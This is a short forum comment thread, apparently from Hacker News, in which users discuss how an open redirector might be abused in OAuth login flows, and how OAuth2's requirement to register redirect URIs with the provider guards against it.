[davewhat]

The flow does not originate at your site. Your site did not create the redirect URI that is being passed to Google / Twitter in your example.

The URL is generated by a malicious party. The URL constructed (1) sends the user to Google / Twitter for authentication, (2) includes a return URL of your open redirector, and (3) has your open redirect send you on to an evil site.

[nailer]

> Your site did not create the redirect URI that is being passed to Google / Twitter in your example.

Sorry, I don't understand this sentence.

The redirect URI is not normally passed to Google / FB / Instagram dynamically, but normally registered with Google / FB / Instagram once, when you set up an app with them (and get a secret key etc).

If someone else registered their own app with their own redirector, they wouldn't have my secret key.

Edit: removed Twitter, they use oAuth 1 which is strange / different / weird.

[icebraining]

No, you do pass the URI dynamically, it's a required part of the Access Token Request: http://tools.ietf.org/html/draft-ietf-oauth-v2-16#section-4....

It's just that with a decent implementation, you should also be required to register it beforehand with the provider.

[vertex-four]

Not just a decent implementation; an implementation which meets the spec. This is not a problem with OAuth2, which explicitly requires registration of URIs where the implicit grant type is used, and covers other cases well in the Security Considerations section.

[nailer]

That makes a lot of sense: I've only really dealt with oAuth 2, as oAuth 1.0a is vastly more complicated and only Twitter seems to still use it.

Thanks icebraining & vertex-four.